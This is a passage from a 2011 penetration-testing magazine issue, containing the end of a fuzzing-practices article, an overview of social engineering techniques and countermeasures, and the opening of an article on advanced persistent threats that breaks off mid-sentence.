Scalable: Time is almost always an issue when it comes to testing.<br />
User must also have control on the fuzzing parameters such as test<br />
coverage. In QA you rarely have much time for testing, and therefore<br />
need to run tests fast. Sometimes you can use more time in testing,<br />
and can select other test completion criteria.<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Documented test cases: When a bug is found, it needs to be<br />
documented for your internal developers or for vulnerability<br />
management towards third party developers. When there are<br />
billions of test cases, automated documentation is the only possible<br />
solution.<br />
Remediation: All found issues must be reproduced in order to fix<br />
them. Network recording (PCAP) and automated reproduction<br />
packages help you in delivering the exact test setup to the developers<br />
so that they can start developing a fix to the found issues.<br />
MOST COMMON MISTAKES IN<br />
FUZZING<br />
Not maintaining proprietary test scripts: Proprietary tests<br />
scripts are not rewritten even though the communication interfaces<br />
change or the fuzzing platform becomes outdated and unsupported.<br />
Ticking off the fuzzing check-box: If the requirement for testers<br />
is to do fuzzing, they almost always choose the quick and dirty<br />
solution. This is almost always random fuzzing. Test requirements<br />
should focus on coverage metrics to ensure that testing aims to<br />
find most flaws in software.<br />
Using hardware test beds: Appliance based fuzzing tools<br />
become outdated really fast, and the speed requirements for the<br />
hardware increases each year. Software-based fuzzers are scalable<br />
in performance, and can easily travel with you where testing is<br />
needed, and are not locked to a physical test lab.<br />
Unprepared for cloud: A fixed location for fuzz-testing makes it<br />
hard for people to collaborate and scale the tests. Be prepared for<br />
virtual setups, where you can easily copy the setup to your<br />
colleagues, or upload it to cloud setups.
SOCIAL FRAUD<br />
Social Engineering<br />
Cyber security is an increasingly serious issue for the complete<br />
world with intruders attacking large corporate organizations with<br />
the motive of getting access to restricted content. CSI Computer<br />
Crime and Security Survey report for the year 2010-2011 stated<br />
that almost half of the respondents had experienced a security<br />
incident, with 45.6% of them reporting that they had been subject<br />
of at least one targeted attack.<br />
Merely trying to prevent infiltration on a technical<br />
level and ignoring the physical-social level,<br />
cent percent security can never be achieved.<br />
Couple of examples can be the scenes from Hackers<br />
which shows Dumpster diving in the target company’s<br />
trash in order to obtain financial data from printouts and<br />
the scene from War Games where Matthew Broderick’s<br />
character studied his target before attempting to crack<br />
the password of the military computer system. Social<br />
Engineering is a threat that is overlooked in most of<br />
the organizations but can easily be exploited as it<br />
takes advantage of human psychology rather than<br />
the technical barricades that surrounds the complete<br />
system. Below is a classic example of this:<br />
A person receives an e-mail on his official mailbox<br />
saying that his computer has been infected with a virus.<br />
The message provides a link and suggests that he<br />
downloads and installs the tool from the link to eliminate<br />
the virus from his computer. The person in a state of<br />
confusion clicks on the link to remove the virus from<br />
his computer but unwittingly giving a hacker an easy<br />
entrance into his corporate network.<br />
To ensure complete security of an organization from<br />
all kinds of internal and external factors, the security<br />
consultant must have complete knowledge of the Social<br />
Engineering cycle, the techniques that can be used by<br />
an attacker and the counter-measures to reduce the<br />
likelihood of success of the attack.<br />
starterkit 02/2011(2)<br />
In this paper we are going to take you through the<br />
various phases so as to understand what is Social<br />
Engineering, Social Engineering Lifecycle, the various<br />
Techniques used in Social Engineering attack with<br />
detailed examples and then finally conclude with the<br />
counter-measures to protect against each of the Social<br />
Engineering attack techniques.<br />
Definition(s) of Social Engineering<br />
The term Social Engineering can be defined in various<br />
ways, relating to both physical and cyber aspects of that<br />
activity. Wikipedia defines social engineering as:<br />
“...the art of manipulating people into performing actions or<br />
divulging confidential information”.<br />
Other authors have provided the following definitions:<br />
“An outside hacker’s use of psychological tricks on legitimate users<br />
of a computer system, in order to obtain information he needs to<br />
gain access to the system”.<br />
“The practice of deceiving someone, either in person, over the<br />
phone, or using a computer, with the express intent of breaching<br />
some level of security either personal or professional”.<br />
“Social Engineering is a non-technical kind of intrusion relying<br />
heavily on human interaction which often involves tricking other<br />
Page 24 http://pentestmag.com
people into breaking normal security procedures” the attacker uses<br />
social skills and human interaction to obtain information about<br />
an organization or their computer systems.<br />
In reality Social Engineering can be any of these<br />
definitions depending on the circumstances that<br />
surround the attack. Social Engineering is actually a<br />
hacker’s manipulation of the natural human tendency<br />
to trust so as to get sensitive information needed to<br />
gain access to a system. Social Engineering does not<br />
require high level of technical expertise but requires<br />
the individual to have decent social skills.<br />
Many people, for several decades have used social<br />
engineering as a method to research and collect<br />
data. These early social engineers would use the<br />
gathered information as a form of blackmail against<br />
the other organizations. Social engineering has been<br />
used to gain unauthorized access into several huge<br />
organizations. A hacker who spends several hours<br />
trying to break passwords could save a great deal of<br />
time by calling up an employee of the organization,<br />
posing as a helpdesk or IT employee, and can just<br />
asking for it.<br />
The Social Engineering Life Cycle<br />
Every Social Engineering attack is unique, but with<br />
a little understanding of the situations encountered,<br />
we can draft a rough cycle of all the activities that a<br />
Social Engineering project goes through leading to a<br />
successful outcome.<br />
The Figure 1 shows a general representation of the<br />
Social Engineering Life Cycle in four main stages.<br />
Footprinting<br />
It is the technique of accumulating information regarding<br />
the target(s) and the surrounding environment.<br />
Footprinting can reveal the individuals related to<br />
the target with whom the attacker has to establish<br />
a relationship, so as to improve the chances of a<br />
successful attack.<br />
The information gathering during the Footprinting<br />
phase includes but is not limited to:<br />
• List of employee names and phone numbers<br />
• Organization Chart<br />
• Department Information<br />
• Location information<br />
Footprinting generally refers to one of the pre-attack<br />
phases; tasks performed prior to doing the actual<br />
Social Engineering attack.<br />
Some of the tools like creepy, SET and Maltego make<br />
Social Engineering engagements easier.<br />
starterkit 02/2011(2)<br />
Establishing Trust<br />
Once the possible targets have been listed out, the<br />
attacker then moves on to develop a relationship with the<br />
target who is usually an employee or someone working in<br />
the business so as to develop a good rapport with them.<br />
The trust that the social engineer is gaining will later<br />
be used to unveil confidential pieces of information that<br />
could cause severe harm to the business.<br />
Psychological Manipulation<br />
In this step, the social engineer manipulates the trust<br />
that he has gained in the previous phase so as to<br />
extract as much confidential information or get sensitive<br />
operations related to the target system performed by<br />
the employee himself so as to penetrate into the system<br />
with much ease.<br />
Once all the required sensitive information has been<br />
collected, the social engineer may move on to the next<br />
target or move towards exploiting the actual system<br />
under consideration.<br />
The Exit<br />
Now, after all the actual information has been extracted,<br />
the Social Engineer has to make a clear exit in such<br />
a way so as not to divert any kind of unnecessary<br />
suspicion to himself.<br />
He makes sure to not leave any kind of proof of his<br />
visit that could lead a trace-back to his real identity nor<br />
link him to the unauthorized entry into the target system<br />
in the future.<br />
The Human Behavior<br />
Every Social Engineer targets specific behavioral traits<br />
in the victim so as to extract maximum information out of<br />
him. These behavioral traits include but are not limited to:<br />
<br />
<br />
<br />
<br />
<br />
<br />
Figure 1. The Social Engineering Life Cycle<br />
Page 25 http://pentestmag.com
Excitement of Victory<br />
Mr. X gets an e-mail stating, You have won 1 Million<br />
Dollars and to claim the winning amount, fill in the<br />
attached document and forward it to the email id:<br />
XXXX@XXXX.com.<br />
Switch off your antivirus as it may block the download<br />
due to highly encrypted Digital Signature of the<br />
documents. Out of Excitement he switches off his<br />
Antivirus and proceeds as ordered and downloads the<br />
document and opens it but finds it corrupted. Little does<br />
he know that he has just downloaded a malware on his<br />
machine which allows the email sender to gain remote<br />
access to his machine.<br />
Fear of Authority<br />
Many people are apprehensive in the presence of<br />
someone they perceive as an authority figure, it is not<br />
that person they are apprehensive about but most likely<br />
the position and power of the person that intimidates<br />
them and makes them.<br />
The attackers take on roles of authority figures such<br />
as law enforcement officers or high-ranking company<br />
officials to extract sensitive organizational information<br />
from the victims.<br />
Desire to be helpful<br />
Keith A. Rhodes, chief technologist at the U.S. General<br />
Accounting Office, which has a Congressional mandate<br />
to test the network security at 24 different government<br />
agencies and departments said in one of his interviews<br />
that, Companies train their people to be helpful, but they<br />
rarely train them to be part of the security process. We<br />
use the social connection between people, their desire<br />
to be helpful.<br />
People in their desire to be helpful and to solve<br />
other peoples queries, give out a lot of information that<br />
otherwise should not be disclosed to an outsider as it<br />
could give an attacker a chance to get unauthorized<br />
access to the target system causing a possible loss.<br />
<br />
<br />
<br />
starterkit 02/2011(2)<br />
<br />
<br />
<br />
<br />
<br />
Figure 2. Social Engineering Techniques<br />
<br />
<br />
<br />
<br />
SOCIAL FRAUD<br />
Fear of Loss<br />
Mr. X gets an e-mail stating, You have won 1 Million<br />
Dollars and to claim the winning amount, deposit $75,000<br />
in Account number: XXXXXX in 10 days from receiving<br />
this e-mail, failing to which the winning amount would<br />
be declared unclaimed and there would be a nee luckydraw<br />
to decide the next winner. Out of fear that he might<br />
lose such a good opportunity, he deposits the amount<br />
to the account number provided. When his future replies<br />
to the e-mail address goes unanswered for the next two<br />
months nor does the 1 Million Dollar gets deposited to his<br />
account, he understands that he has been scammed.<br />
Laziness<br />
All of us have come across some or the other job<br />
that requires us to do only a specified set of activities<br />
and not linger around looking for better ways of doing<br />
that activity. This causes boredom to the person who<br />
performs the same task repeatedly on daily basis and<br />
over the time learns shortcuts to do the tasks using<br />
minimal efforts and still meeting the targets.<br />
Such individuals over a period of time become lazy<br />
and are susceptible to attackers who target such<br />
individuals as they know that they would get the required<br />
information with much ease due to the laid back attitude<br />
of these individuals towards their work.<br />
Ego<br />
Many a times, the attacker makes the person more<br />
emotionally sure of himself/herself and thus removing<br />
the logical awareness of the security breach that is<br />
occurring.<br />
The result is that, the person being hacked senses<br />
no harm in providing whatever it is that the attacker is<br />
requesting. The reason that such an attack succeeds is<br />
that the attacker is a receptive audience for victims to<br />
display how much knowledge they have.<br />
Insufficient knowledge<br />
Knowledge about the target system is one of the<br />
key factors that differentiate the attacker from other<br />
employees of the organization. Many a times, due to<br />
lack of proper training, the employees are themselves<br />
not sure if they have complete knowledge about the<br />
product and Social Engineers take advantage of<br />
such situations by creating a sense of urgency and<br />
not allowing the employee much time to think and<br />
understanding the fact that they are under attack.<br />
The Weapons of a Social Engineer<br />
The old-fashioned technical way of breaking into the<br />
computer systems by brute-forcing the user logins or<br />
ports have now been replaced by sophisticated methods<br />
Page 26 http://pentestmag.com
that not only are easier, but yield better and faster<br />
results based on human psychology. These attacks can<br />
help the attacker get access to any system irrespective<br />
of the platform, software or hardware involved.<br />
How exactly goes a person to carry out Social<br />
Engineering attack? The figure below shows some of<br />
the most popular techniques used to perform a Social<br />
Engineering attack: Figure 2.<br />
Shoulder Surng<br />
Shoulder surfing is a security attack where-in, the<br />
attacker uses observational techniques, such as<br />
looking over someone’s shoulder, to get information<br />
while they are performing some action that involves<br />
explicit usage of sensitive, visible information. This can<br />
be performed at a close range as well as at a long range<br />
using binoculars or other vision-enhancing devices.<br />
Dumpster Diving<br />
Many a times, huge organizations dump items like<br />
company phone books, system manuals, organizational<br />
charts, company policy manuals, calendars of<br />
meetings, events and vacations, printouts of sensitive<br />
data or login names and passwords, printouts of source<br />
code, disks and tapes, company letterhead and memo<br />
forms, and outdated hardware carelessly into the<br />
company dumpsters. The attacker can use these items<br />
to get a huge amount of information about the company<br />
organization and network structure.<br />
This method of searching through the dumpster,<br />
looking for potentially useful information discarded by a<br />
company’s employees is known as Dumpster Diving.<br />
Role playing<br />
It is one of the key weapons for a Social Engineer. It<br />
involves persuading or gathering information through<br />
the use of an online chat session, emails, phone or any<br />
other method that your company uses to interact online<br />
with the public, pretending to be a helpdesk, employee,<br />
technician, helpless or an important user to divulge in<br />
confidential information.<br />
Trojan horses<br />
It is one of the most predominant methods currently<br />
used by hackers that involve tricking the victims to<br />
download a malicious file to the system, which on<br />
execution creates a backdoor in the machine that can<br />
be used by the attacker any time in the future and thus<br />
having complete access of the victim’s machine.<br />
Phishing<br />
It is the act of creating and using Websites and e-mails<br />
designed to look like those of well-known legitimate<br />
starterkit 02/2011(2)<br />
businesses, financial institutions and government<br />
agencies to deceive Internet users into disclosing their<br />
personal information and falsely claiming to be an<br />
established legitimate enterprise in an attempt to scam<br />
the user into surrendering private information that will<br />
be used for identity theft.<br />
Surng Organization Websites & Online forums<br />
Huge amount of information regarding the organization<br />
structure, email ids, phone numbers are available<br />
openly on the company website and other forums. This<br />
information can be used by the attacker to refine his<br />
approach and create a plan on whom to target and the<br />
method to be used.<br />
Reverse Social Engineering<br />
A reverse social engineering attack is an attack in which<br />
an attacker convinces the target that he has a problem<br />
or might have a certain problem in the future and that<br />
the attacker, is ready to help solve the problem. Reverse<br />
social engineering involves three parts:<br />
• Sabotage: After the attacker gains a simple access<br />
to the system, he corrupts the system or gives it<br />
an appearance of being corrupted. When the user<br />
sees the system in the corrupted state, he starts<br />
looking for help so as to solve the problem.<br />
• Marketing: In order to make sure that the user<br />
approaches the attacker with the problem, the<br />
attacker advertises himself as the only person who<br />
can solve the problem.<br />
• Support: In this step, he gains the trust of the target<br />
and obtains access to sensitive information.<br />
Defense against Social Engineering<br />
There is no effective way to protect against a Social<br />
Engineering attack because no matter what controls are<br />
implemented, there is always that human factor which<br />
influences the behavior of an individual.<br />
But, there are certain ways to reduce the likelihood<br />
of success of the attack. It is also important for<br />
organizations to establish a clear and strong security<br />
policy and processes to reduce the threat of social<br />
engineering. The following are some of the steps to<br />
ensure protection against Social Engineering attack:<br />
Security Awareness Trainings<br />
Security Awareness is the simplest solution to prevent<br />
Social Engineering attacks. Every person in the<br />
organization must be given basic security awareness<br />
training on timely basis that he/she should never give<br />
out any information without the appropriate authorization<br />
and that he/she should report any suspicious behavior.<br />
Page 27 http://pentestmag.com
Background Verication<br />
There is many a chance that attacker may join the<br />
company as an employee so as to gather insider<br />
information about the company. This makes background<br />
screening a really important part of company policies to<br />
counter Social Engineering attack. It should not only be<br />
limited to internal employees but must also be extended<br />
to vendors and other contractual workers too before<br />
they become the part of the organization or are given<br />
access to the organization network.<br />
Physical security<br />
There should be proper access control mechanism in<br />
place to make sure that only authorized people are<br />
allowed access to restricted sections of the organization.<br />
There should be no tail-tagging.<br />
Limited data leakage<br />
There should be constant monitoring as to what all<br />
information about the organization is floating on the<br />
World Wide Web. Any kind of irregularity should be<br />
immediately taken care of. This will make passive<br />
information gathering difficult for the attacker.<br />
Mock Social Engineering drills<br />
Special Social Engineering activities should be<br />
performed on the internal employees of the organization<br />
by either the security team or by the vendor so as<br />
to keep track of the security awareness levels in the<br />
organization.<br />
Data Classication policy<br />
There should be proper classification of data on the<br />
basis of their criticality levels and the access personnel.<br />
Data classification assigns a level of sensitivity to<br />
company information.<br />
Each level of data classification includes different<br />
rules for viewing, editing and sharing of the data. It helps<br />
to deter social engineering by providing employees a<br />
mechanism for understanding what information can be<br />
disclosed and what cannot be shared without proper<br />
authorization.<br />
Some of the other controls that should be taken care<br />
of, to reduce the success of a Social Engineering attack<br />
are listed below:<br />
• Install and maintain firewalls, anti-virus, antispyware<br />
software’s, and email filters.<br />
• Never allow people to tailgate with you.<br />
• There should be a proper Incident response<br />
strategy set for the organization.<br />
• Usage of corporate ID’s on public domain, blogs,<br />
discussion forums etc should be restricted.<br />
starterkit 02/2011(2)<br />
SOCIAL FRAUD<br />
• Pay attention to the URL of a web site. Though<br />
malicious web sites generally look identical to a<br />
legitimate site, but the URL may use a variation in<br />
spelling or a different domain.<br />
• Confidential and critical online details like corporate<br />
mail box should not be accessed in public places,<br />
cafes, and hotels etc. where Internet security<br />
cannot be trusted.<br />
• Don’t send sensitive information over the Internet<br />
before checking a web sites security.<br />
• Don’t reveal personal or financial information in<br />
email, and do not respond to email solicitations<br />
requesting this information.<br />
• Ensure all physical entry and exit points are<br />
secured at all times.<br />
• Do not provide personal information or information<br />
about your organization to anyone unless you<br />
are certain of the person’s authority to have that<br />
information.<br />
• Use virtual keyboard where applicable.<br />
• Be very careful what is provided on your company<br />
web site. Avoid posting organizational charts or lists<br />
of key people wherever possible.<br />
• Make sure to shred any document that is discarded<br />
that may contain sensitive data.<br />
Conclusions<br />
Through this article we can understand that, however<br />
secure your application is, it is always vulnerable to<br />
one thing The Human Factor. This human factor is<br />
the weakest link in security which can be patched not<br />
by one time training but only by an ongoing process<br />
of improvement. Many times it’s rather the interaction<br />
between the data and the person has to be secured<br />
rather than the interaction between data and server.<br />
DINESH SHETTY<br />
Dinesh Shetty is a Information Security<br />
Consultant from one of the leading<br />
security organization in India. He is a<br />
EC council Certied Ethical Hacker and<br />
a IBM certied Appscan Specialist. He<br />
has authored ve articles on technology<br />
subjects which have been published<br />
in multiple InfoSec Magazines and<br />
international journals to date.He has<br />
found aws in leading Web and Mobile<br />
based Financial applications and helped the organizations<br />
solve the vulnerabilities before they could be exploited.<br />
Passion for research is what drives him and he works till late<br />
mornings everyday to fulll his quest for knowledge.<br />
Page 28 http://pentestmag.com
Preventing<br />
deer -in-headlights<br />
Get the best Live Online classes<br />
anywhere. Get 10% off when you use code<br />
BESTONLINE at checkout.<br />
ISSMP, ISSAP, CISSP, CERTIFIED ETHICAL<br />
HACKER classes start every week.<br />
e<br />
www.ExpandingSecurity.com<br />
Pen Testing and Training…<br />
with Freedom, Responsibility, and Security for All.<br />
look
When Computer<br />
Attacks<br />
But before taking any action we have to bring<br />
awareness to what this new kind of threat means:<br />
the only way to be protected is understanding<br />
what this means for the organizations and how it<br />
could impact their business. Undoubtedly exceptional<br />
circumstances call for exceptional actions. So, maybe<br />
it is time to acknowledge that computer attacks do not<br />
always happen to others; we need to become aware and<br />
to be prepared in advance to minimize risk exposure at<br />
this kind of attacks, protecting both our organizations<br />
and their leaders.<br />
Even if you are not an expert in Information Security,<br />
you can infer that in order to attack different targets such<br />
as the UN (United Nations); Colombia’s Administrative<br />
Department of Security (DAS for its Spanish acronym);<br />
Guayaquil City Hall’s Website; thousands of Ecuadorian<br />
policemen’s personal data; Latin American political<br />
leaders’ Twitter and Facebook accounts; and similar<br />
targets in Europe or in the US, significant know-how and<br />
coordination levels are required. And all of this calls for<br />
resources that exceed the possibilities of enthusiastic<br />
university (or college) hackers.<br />
Furthermore, Internet-disclosed threats about future<br />
attacks on new public and private companies’ sites in the<br />
short run should act as a wake-up call to understand that<br />
we are facing an unprecedented type of motivation.<br />
Please <strong>note</strong> that although Advanced Persistent<br />
Threats are the type of attacks perpetrated by some<br />
starterkit 02/2011(2)<br />
SOCIAL FRAUD<br />
don’t always happen to others: Advanced Persistent<br />
Threats<br />
There is a new type of cyber threat that is catching more victims<br />
every day; many people know it is called Advanced Persistent<br />
Threats, and there is a trace of high profile victims out there to<br />
give us enough.<br />
social action and cyber-terrorism groups worldwide<br />
(of proven reach in Latin America), rather than<br />
categorizing their perpetrators from the philosophical<br />
and political standpoints, we should take threats<br />
seriously and become aware that globalization of<br />
knowledge and information put these techniques at<br />
hand for anyone with motivation and time enough to<br />
deploy them.<br />
The Murder of Ego (…and some other myths<br />
as well)<br />
So, this kind of attacks present the three main aspects<br />
of a crime: motive, means and opportunity; there’s not<br />
much we can do to influence on the first one; but we do<br />
have plenty of things to do with respect to the remaining<br />
two… needless to say that crimes are not feasible<br />
without one of these three aspects!<br />
In the first place we must destroy the myth of those<br />
who so far, have not experienced a massive proportion<br />
computer attack. To them information security is not a<br />
priority, or directly (in the worst case scenario) it is not<br />
a significant issue. Maybe this is a wound for the ego of<br />
many security administrators. Though let’s face it: we’d<br />
better feel touched by a whitepaper that enables us<br />
to be prepared and to prevent, rather than suffering a<br />
large scale attack with serious consequences.<br />
As a professional, without a doubt this is one of the<br />
worst arguments I could possibly hear from those<br />
Page 30 http://pentestmag.com
who are responsible for IT service infrastructure<br />
management, because (just to mention a few) they<br />
ignore the main feature of these next-generation<br />
attacks: their sneakiness!<br />
15 years ago, when a virus infected a PC, the<br />
worst threat would be the deletion of all hard-disk<br />
stored data; then, with the massiveness of Local Area<br />
Networks first, and of the Internet later, viruses had the<br />
possibility to accelerate their dissemination and erase<br />
the hard disks of more PCs, something really very<br />
uncomfortable.<br />
Nonetheless, we still had an advantage because we<br />
certainly knew when the infection had taken place; and<br />
once the PC had been reinstalled, infection would be<br />
over.<br />
Today facts are way too different: the first goal of<br />
globally-distributed threats is to avoid generating the<br />
kind of disasters made in the past; their main goal is to<br />
remain undercover! Underground movements pay off<br />
better than hard disk deletions, because they enable<br />
ongoing and surreptitious digital crime perpetration for<br />
a while longer.<br />
An Opportunity To Prevent From Being In The<br />
Middle Of An Attack<br />
With respect to means and opportunity, we will further<br />
provide detailed technical issues regarding APT attacks.<br />
However, bear in mind the following key items:<br />
• There is no exploit without vulnerability. Every<br />
attack is based on vulnerabilities (i.e. actual<br />
chances of executing a threat); although there exist<br />
some topological or protocol matters very hard<br />
(sometimes impossible) of being ducked, in most<br />
cases we prove that some vulnerabilities –either in<br />
applications, operating systems or configurations-<br />
are predictable and therefore preventable.<br />
• Closely related with the item above, many of the<br />
vulnerabilities in question find their source in<br />
deficiencies (or worse, nonexistence) of a process<br />
to assure early detection, remediation, and<br />
verification. So, to say it as clearly as we possibly<br />
can with a real-life example, some organizations<br />
have documented and implemented processes<br />
to request new office inputs where up to three<br />
levels of approval are required. However they<br />
have done nothing when it comes to checking an<br />
application’s security code before its clearance for<br />
production.<br />
Ultimately, this is basically a matter of not facilitating<br />
the means to become an easy target for computer<br />
attacks when we could prevent them.<br />
starterkit 02/2011(2)<br />
There is nothing we can do to prevent the existence<br />
of people with the necessary know-how and motivation<br />
to produce this kind of attacks. But there are many other<br />
things we can do:<br />
• Do everything within our reach to stay away from<br />
attackers, or at least attempt to discourage them<br />
by turning attacks into something so difficult to<br />
accomplish that time investment will not pay off.<br />
• Protect our information assets in such a way that<br />
although a hacker may access them, it won’t be<br />
able to use them, (something similar to some<br />
systems installed in high-end vehicles: those cars<br />
do not require of an alarm, because although you<br />
can open them, without the electronic key the car<br />
won’t start!).<br />
Ok Now, What Do We Mean When We Say<br />
Advanced Persistent Threat (APT) Attack?<br />
Let’s deconstruct the three aspects involved in this<br />
name to have a thorough idea of what we are facing.<br />
Advanced<br />
I assume you scare to death when people use the word<br />
advanced to refer to an attack! Well, you are right to be<br />
scared.<br />
The reason why this word is included in the APTs<br />
description is because this type of attacks use different<br />
techniques to reach their targets; they are considered<br />
advanced for the fact that attackers have different<br />
techniques at hand and are not limited to a specific<br />
issue (as it happens for example with application<br />
attacks).<br />
Some of the techniques used in global scale APT<br />
attacks are the following:<br />
• DDoS (distributed denial of service): distributed<br />
denial of service attacks.<br />
• Botnets<br />
• Phishing<br />
• Social Engineering<br />
• SPAM<br />
• Fraudulent applications in social networks<br />
• Vulnerability Analysis<br />
• Rootkits<br />
• Applications vulnerabilities exploit<br />
In addition to this, we could say that performance and<br />
execution of this kind of techniques require interaction<br />
of more than one person; in fact it is almost impossible<br />
for individuals to carry out these attacks, not only<br />
because of the skills required but because of time and<br />
resources involved.<br />
Page 31 http://pentestmag.com
Persistent<br />
Within Information Security Community, and mainly<br />
amongst hacking techniques experts, there is a belief<br />
that no matter how many protective measures you<br />
implement, targets will always be potentially vulnerable<br />
if there is enough time and motivation. Unfortunately<br />
this has proven to be true in most cases.<br />
In fact, when we say that these attacks are persistent<br />
we mean that they focus in a given target, using different<br />
techniques until reaching their goal.<br />
Usually when computer attacks are addressed from a<br />
business standpoint, it is very common to say that it has<br />
to do with a large scale businesses; in other words that<br />
the ultimate goal is to launch a massive threat that will<br />
only hit on a restricted number of victims, though this is<br />
more than enough to have a return on investment and<br />
profit.<br />
Threat<br />
Use of different techniques and coordination of multiple<br />
resources to achieve a goal, tell us about a very strong<br />
motivation: APT attacks share a feature in common;<br />
all individuals involved in the attack are determined to<br />
accomplish their objective.<br />
A threat is the possibility of materializing a risk; if we<br />
think about a group of organized people, with resources<br />
at hand, the necessary skills to use those resources and<br />
the determination to insist on the attack, it is clear that<br />
the hacking maxim mentioned before gains a renewed<br />
meaning!<br />
What Is Hidden In The Name: If All The Aforesaid<br />
Had Not Worried You …<br />
It’s important to bear in mind that this kind of attacks are<br />
also based on unknown techniques, i.e. vulnerabilities<br />
or exploits non massively diffused or announced, since<br />
perpetrators of these attacks have the necessary time<br />
and skills to develop them.<br />
This is a key reason why these kinds of attacks<br />
are different from the rest. While traditional attacks<br />
pursue simple targets (based on a cost-effective ratio<br />
between their efforts to vulnerate and the financial<br />
gain), APT attackers are willing to do everything just<br />
for accomplishing their goal, even if it implies the<br />
development of some new kind of threat.<br />
Use of unknown threats and new kinds of attacks<br />
bring value added for APTs, something attackers are<br />
really looking for; this makes their early detection more<br />
difficult! Like we said, these attacks are characterized<br />
by their sneakiness; the purpose here is to keep threat<br />
inactive or acting undetectably, steeling information. For<br />
example, by enhancing effectiveness time; the longer<br />
these techniques (used to permeate information and<br />
starterkit 02/2011(2)<br />
SOCIAL FRAUD<br />
make use of the threat) remain anonymous, the better<br />
for attackers.<br />
Digital Identity And Brand… Weren’t They<br />
“Intangible”?<br />
If there is something Advanced Performance Threats<br />
have made possible, is the fact that they have turned<br />
some kind of assets usually referred to as intangibles<br />
into something concrete. Of course, the Marketing<br />
& Finance Areas have always known quite well the<br />
(monetary) value of a brand (both for a company and<br />
for a line of specific products). Nonetheless many IT<br />
Departments have not handled the same business<br />
parameters to value and protect these assets.<br />
However, from the attack that infringed security of<br />
a renowned consumers good brand and modified the<br />
contents of a recipe where those those products were<br />
used, up to more complex issues where very expensive<br />
Intellectual Property infringements took place, the<br />
threats referred to in this whitepaper show the high<br />
exposure degree to which a company’s most significant<br />
assets are exposed (in fact many authors agree that<br />
brand is the most valuable asset).<br />
Technology and Security Areas Managers should pay<br />
much attention on this issue. If their objective is to add<br />
value to the business and become strategic business<br />
areas for the organization, the fact of the company<br />
investing lots of money in advertising and social<br />
action campaigns to raise the value of a brand, and<br />
then having this value affected because of computer<br />
attacks, would not only jeopardize the organization’s<br />
confidence on these areas, it might as well be seen as<br />
a weakness.<br />
Conclusion<br />
We shall review next some key items at the time of<br />
evaluating our protection against APT attacks; once<br />
again do not consider this as a thorough list, since<br />
we may find many other information sources with<br />
different and highly useful recommendations. Though<br />
I do strongly recommend considering all these<br />
aspects and analyzing how each one applies to the<br />
organization.<br />
Risk Analysis: Imminent Realization!<br />
In general, the best way to understand what proactive<br />
measures are required to reduce exposure degree,<br />
and therefore threatening risks for organizations is to<br />
perform a risk analysis.<br />
However, please <strong>note</strong> that I am referring to<br />
quantitative risk analyses, made in a wide awake<br />
and thorough manner, including all organization’s<br />
information assets, i.e. the kind of interdisciplinary<br />
Page 32 http://pentestmag.com
analysis that should not be made by the IT area alone,<br />
where all organization’s areas should be necessarily<br />
involved. These kinds of analyses typically require<br />
of an external vendor’s assistance with a team of<br />
experts who contribute with their skills, experience and<br />
qualified human resources to accelerate information<br />
gathering and classification.<br />
I believe every organization should implement this kind<br />
of analysis, and at least should update them on a yearly<br />
basis. This is something stated by several international<br />
standards for many years now (ISO 17779, ISO 27001,<br />
BS 7799) as well as for the methodologies that support<br />
this task (MAGERIT, COBIT).<br />
Lack of analyses to assess an organization’s assets<br />
and exposure risks has several impacts on IT and<br />
Information Security strategic planning, though it hits as<br />
well everyday matters, i.e. investment rationale!<br />
Ghosts do Exist<br />
I have tried to reinforce the secret characteristic of APT<br />
attacks. This is something that should make us think<br />
that chances of having our organization’s components<br />
infected are very high (or are on their way to being<br />
infected).<br />
In fact, many experts go a bit further and propose<br />
working based on a specific assumption; that their<br />
organization has already been infected. So they<br />
suggest working as from there. I must confess that I<br />
agree with this approach!<br />
Assuming that company has been infected by some<br />
kind of silent threat does not mean to check that you<br />
have the latest antivirus version in place or review<br />
the list of open ports at the firewall; this is an indepth<br />
insight and self-awareness process where all<br />
technological aspects, processes and human resources<br />
of the organization should be involved.<br />
Controlling Is Not The Same Than Prohibiting<br />
Many organizations have decided to limit (or directly<br />
prohibit) access to social networks, messaging, and a<br />
growing number of websites and applications to their<br />
employees; in most cases this is the plain result of<br />
categorizing these sites as dangerous, and in the best<br />
case scenario reveals a deep unawareness of how<br />
social networks and individuals work.<br />
It’s been widely proven that any ban triggers a<br />
countermeasure; if users want to access a forbidden<br />
site they will certainly find their way to do it, and most<br />
likely while trying to do so new problems will arise.<br />
Some organizations, further to a risk analysis make<br />
a quantitative decision to prohibit one or several<br />
applications based on a tangible business risk. Well,<br />
those organizations are in the right pathway; however<br />
starterkit 02/2011(2)<br />
they represent a minimal amount out of the aggregate;<br />
and those who have really made it usually opt to forbid<br />
the least possible number of sites.<br />
Before prohibiting, organizations should first evaluate<br />
what the benefits are of controlling use of these<br />
potentially hazardous applications; social networks are<br />
growing sources for revenue generation, in addition to<br />
relatively low-cost and widespread promotion sources!<br />
Many companies have people devoted to managing<br />
promotion and sales channels in social networks.<br />
If companies are going to increasingly use this kind<br />
of communications channels as an alternative to the<br />
traditional ones, maybe the wisest thing to do would be<br />
recognizing those potential benefits and opportunities<br />
of encouraging a controlled use to minimize risks, rather<br />
than trying to prohibit something that sooner or later, in<br />
one way or another we will have to allow, without the<br />
skill and experience we would have gained if we had<br />
cleared it from the very beginning.<br />
On the other hand, the fact of prohibiting something<br />
makes us feel we don’t have to worry for that anymore,<br />
something that may turn into a double-edged sword!<br />
Although Devices Are Not Company-owned, They<br />
Still May Have Company’s Information<br />
Some years ago it was very easy to draw an imaginary line<br />
between the organization and the outer world (perimeter),<br />
and focus our protection efforts in safeguarding the<br />
traffic through this line. The regulating principle for this<br />
approach was that everything inside the line belonged<br />
to the company and therefore had to be protected, while<br />
everything on the other side of the line belonged to the<br />
outer world and it was the source of any threat.<br />
Even though we should have quit that myth several<br />
years ago due to some statistics showing that above<br />
70% of attacks perpetrated against an organization<br />
had their source on the intranet (i.e. the inner side of<br />
the perimeter); over the last years we have seen that<br />
line blur at a high-speed pace; first due to timework<br />
expansion, followed by Business to Business interconnections;<br />
and more recently the Coup de grậce<br />
(finishing blow) fostered by the increasing adoption of<br />
Cloud Computing.<br />
Well then, in addition to everything known and<br />
mentioned in this paper, a new kind of threat is knocking<br />
on our doors; and we’d better take it into account; let’s<br />
welcome Smartphones, PDAs, tablets and alike!<br />
These devices, that in most cases are not property of<br />
the organization, usually have access to email and other<br />
systems, and possess organization’s critical information<br />
that not only are outside organization boundaries, but<br />
travelling directly who knows where, without any kind of<br />
